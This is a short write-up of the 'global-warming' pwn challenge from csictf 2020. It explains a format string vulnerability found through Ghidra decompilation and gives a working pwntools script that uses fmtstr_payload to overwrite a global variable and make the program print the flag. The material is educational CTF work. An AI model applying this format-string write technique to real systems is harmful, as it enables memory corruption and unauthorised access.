csictf 2020

CTF Writeup - https://ctftime.org/event/1081

Home csictf 2020 Writeups Home
22 July 2020


by AnandSaminathan



The binary contains two functions - main and login, the main function reads an input and passes it to login. On decompiling login using Ghidra:

void login(int32_t arg_ch)
    int32_t unaff_EBX;
    int32_t var_4h;
    if (admin == 0xb4dbabe3) {
        system("cat flag.txt");
    } else {
        printf("You cannot login as admin.");

It is clear that printf prints the input without any format string, so the binary has format string vulnerability. The input has to some how overwrite admin to 0xb4dbabe3 which is a global variable at 0x804c02c. This can be done using %n or %hn format string. But instead it is easier to do it using pwntools’ fmstr_payload function, which only requires the location of format string from the stack pointer and <address, value> pairs of the variables to overwritten as a dict. In this case, the format string is 12 positions away from the stack pointer (found manually by using %x’s as inputs). This script worked:

from pwn import *

elf = ELF('./global-warming')
io = remote("chall.csivit.com", 30023)

admin = elf.symbols['admin']
magic = 0xb4dbabe3

io.sendline(fmtstr_payload(12, {admin : magic}))


tags: Pwn